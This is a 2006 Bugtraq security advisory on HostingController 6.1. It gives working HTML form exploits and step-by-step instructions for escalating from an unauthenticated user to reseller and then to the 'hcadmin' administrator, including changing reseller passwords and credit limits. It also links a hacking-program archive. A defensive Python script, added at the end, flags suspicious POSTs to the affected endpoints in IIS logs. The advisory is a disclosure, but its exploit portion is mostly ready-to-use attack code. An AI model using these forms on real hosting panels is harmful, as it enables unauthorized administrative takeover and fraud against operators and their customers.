HostingController: An attacker can gain reseller privileges and after that can gain admin privileges
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: HostingController: An attacker can gain reseller privileges and after that can gain admin privileges
- From: Irsdl@xxxxxxxxx
- Date: 7 Jul 2006 15:31:51 -0000
Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I am publishing the most
important bugs of the Hosting Controller program, 3 weeks after reporting them to
the main company (for more security).
Title: An attacker can gain reseller privileges and after that can gain admin
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006
1- This code gives a resadmin session to a user:
The bug is in "hosting/addreseller.asp": no check is in place.
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
URL: <input type="text" name=siteact size=70>
<form name="frm1" method="post" onsubmit="return siteaction()">
<td><input type="text" name="reseller" value="hcadmin"></td>
<td><input type="text" name="loginname" value="hcadmin"></td>
<td><input type="text" name="Password" value=""></td>
<td><input type="text" name="first_name" value=""></td>
<td><input type="text" name="first_name" value=""></td>
<td><input type="text" name="last_name" value=""></td>
<td><input type="text" name="address" value=""></td>
<td><input type="text" name="city" value=""></td>
<td><input type="text" name="state" value=""></td>
<td><input type="text" name="country" value=""></td>
<td><input type="text" name="email" value=""></td>
<td><input type="text" name="phone" value=""></td>
<td><input type="text" name="fax" value=""></td>
<td><input type="text" name="zip" value=""></td>
<td><input type="text" name="selMonth" value=""></td>
<td><input type="text" name="selYear" value=""></td>
<td><input type="text" name="txtcardno" value=""></td>
<br><input type="submit">
2- This code lists all of the resellers; you must then change the password of one of
them and log in with it for the next step.
Note: With this code, anyone can also increase their Credit value and then buy every
<td><input type="text" name="UserName" value="hcadmin"></td>
<td><input type="text" name="Description" value=""></td>
<td><input type="text" name="FullName" value=""></td>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
<td><input type="text" name="UserChangePassword" value=""></td>
<td><input type="text" name="PassCheck" value="0"></td>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
<td><input type="text" name="CreditLimit" value="99999"></td>
<br><input type="submit">
3- Now you must log in as the reseller whose password was changed in the last step. Now
go to the user list; if there is a user, that will be enough, and if no user is available, you
must create one!
Now select it and click Enter to enter as that user. Now the bug will be
each reseller can gain every user session, even "HCADMIN", by a bug in
The code below will help you:
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<td><input type="text" name="AdName" value="hcadmin"></td>
<br><input type="submit">
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs
by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password:
grayhatz.net] (HC automation hacking program source code by simple VB)
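
A log check for the requests described in steps 1 and 3, as an added example that is not part of the original advisory: it parses IIS W3C extended logs and flags POSTs to "/hosting/addreseller.asp" and "/Admin/Check_Password.asp" that were not submitted from the panel's own pages. It assumes the log records cs-host and cs(Referer); the sample log lines, host names and IP addresses are constructed placeholders.

```python
from urllib.parse import urlsplit

# Endpoints named in the advisory, lower-cased (IIS paths are case-insensitive).
WATCHED = {"/hosting/addreseller.asp", "/admin/check_password.asp"}

# Constructed sample in IIS W3C extended format; hosts and IPs are placeholders.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(Referer)
2006-07-07 10:00:01 192.0.2.10 POST /hosting/addreseller.asp htype=3 200 panel.example.test -
2006-07-07 10:00:09 192.0.2.10 POST /Admin/Check_Password.asp - 302 panel.example.test http://other.example.test/poc.html
2006-07-07 10:02:00 198.51.100.7 POST /hosting/addreseller.asp htype=3 200 panel.example.test http://panel.example.test/hosting/resellers.asp
2006-07-07 10:03:00 198.51.100.7 GET /hosting/addreseller.asp - 200 panel.example.test -
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def suspicious_posts(text):
    """Return (client_ip, path, reason) for POSTs to watched pages not sent from the panel."""
    hits = []
    for r in parse_w3c(text):
        path = r.get("cs-uri-stem", "").lower()
        if r.get("cs-method") != "POST" or path not in WATCHED:
            continue
        referer = r.get("cs(Referer)", "-")
        ref_host = (urlsplit(referer).hostname or "") if referer != "-" else ""
        host = r.get("cs-host", "").lower().split(":")[0]
        if not ref_host:
            hits.append((r.get("c-ip", "?"), path, "no referer"))
        elif ref_host != host:
            hits.append((r.get("c-ip", "?"), path, "off-site referer " + ref_host))
    return hits

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG):
        print(*hit)
```

The Referer header is supplied by the client, so this is a triage aid for reviewing past activity on unpatched installs, not a control; the fix stated in the advisory is the update to Hotfix 3.2.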